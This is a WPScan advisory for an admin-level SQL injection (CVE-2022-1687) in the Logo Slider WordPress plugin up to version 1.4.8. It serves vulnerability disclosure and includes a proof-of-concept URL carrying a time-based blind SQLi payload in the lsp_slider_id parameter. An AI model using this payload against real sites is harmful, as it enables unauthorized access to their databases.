WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Logo Slider <= 1.4.8 - Admin+ SQLi

Description

The plugin does not sanitise and escape the lsp_slider_id parameter before using it in a SQL statement via the Manage Slider Images admin page, leading to an SQL Injection

Proof of Concept

https://example.com/wp-admin/admin.php?page=manage_images&lsp_slider_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)

Affects Plugins

logo-slider
No known fix - plugin closed

References

CVE
CVE-2022-1687
URL
https://bulletin.iese.de/post/logo-slider_1-4-8

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)

Submitter

Daniel Krohmer

Submitter website
https://iese.fraunhofer.de/en.html
Verified

Yes

WPVDB ID
e7506906-5c3d-4963-ae24-55f18c3e5081

Timeline

Publicly Published

2022-05-09 (about 1 years ago)

Added

2022-05-12 (about 1 years ago)

Last Updated

2022-05-14 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin